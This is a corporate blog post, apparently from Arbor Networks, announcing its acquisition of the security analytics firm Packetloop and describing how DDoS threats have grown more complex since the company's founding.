From our founding more than a dozen years ago, Arbor has studied network traffic. We started as a research project at the University of Michigan, looking at routing instability on large distributed networks. This led from monitoring network traffic, and modeling it, to identifying anomalies related to DDoS attacks. With that, Arbor Networks was commercialized and the concept of wide-scale network behavior analysis was born.

In that time, everything about DDoS has changed. What was once dismissed as a basic attack, or service provider problem, is now a complex, multi-vector threat targeting enterprises. Arbor co-founder Rob Malan tells a great story that sums this up perfectly,

“I remember meeting with a VC back in October or November of 2001 on Sand Hill Road with Farnam…He sneered at us, told us that denial-of-service was a fad that had passed, and that we’d be out of business within six months. It turns out that his firm is the one that no longer exists.”

Just last week, SC Magazine ran the story “Three banks plundered with DDoS distraction”: an application-layer DDoS attack was used to divert the attention and resources of the banks away from fraudulent wire transfers occurring at the same time. This is by no means unique. Multi-vector attacks combine malware, flooding, application-layer and state-exhaustion attacks against infrastructure devices, all in a single, sustained attack.

No matter how much the threats and the attackers have changed, security still comes down to traffic: seeing it, studying it, understanding it, and ultimately leveraging that understanding to deliver powerful analytics that allow defenders to protect their infrastructure and assets in new, transformative ways.

With that last sentence in mind, I couldn’t be more excited about Arbor Networks’ acquisition of Packetloop. Simply put, Packetloop will enable Arbor to leverage our unprecedented visibility and understanding of the network to deliver powerful and transformative analytics and protection capabilities to our customers and the security market.

Why Packetloop? It comes down to four things: people, technology, vision and customers.

First, let’s talk about the people. We at Arbor pride ourselves on having an amazing company culture that is all about employing the best, brightest and most motivated people who are committed to collaboration and problem solving. I truly believe that this has probably been the biggest reason behind our sustained success over the years. When we met and got to know the team at Packetloop, we immediately recognized they brought this same passion and commitment to their work. We also quickly recognized they were the best and brightest when it came to the area of big data, security analytics and bringing disruptive and transformative technologies to market. We knew straight away that we wanted them to be a part of the team at Arbor, and thankfully, they felt the same way.

Packetloop has a set of technologies that address some very difficult security problems that have been and continue to keep customers up at night. They’ve developed a powerful decision making platform that brings context to massive amounts of data that can paralyze security teams.

With Packetloop, Arbor is in a unique and enviable position to deliver a network-based, full-spectrum security visibility, detection, mitigation and analytics platform that can scale to terabytes and petabytes of both real-time and retrospective security data.

Like Arbor, Packetloop has a well thought out and innovative vision for the problems they want to solve, approaches for solving them, and the near term plans to execute and make these solutions a reality. In short, like Arbor, Packetloop gravitated toward the hard problems and the innovative solutions that truly deliver as promised.

Finally, and most importantly, Packetloop knows how important the customer is, and they want nothing more than to deliver solutions that do what they are supposed to do, deliver meaningful customer value and show an obvious return on investment in the eyes of users. Like Arbor, they put the customer first, partner with them and help them solve their toughest security challenges.

We are ecstatic to welcome Scott, Michael, Tyson and the rest of the Packetloop team to Arbor. Combining Arbor’s scale, complementary technology and network security DNA with Packetloop’s next-generation security analytics platform and big data pedigree is an obvious win for us. Everyone at Arbor is excited and energized. This is a great development for Arbor, our customers and the security marketplace in general. And you don’t just have to take my word for it; you will get to see for yourselves shortly :)
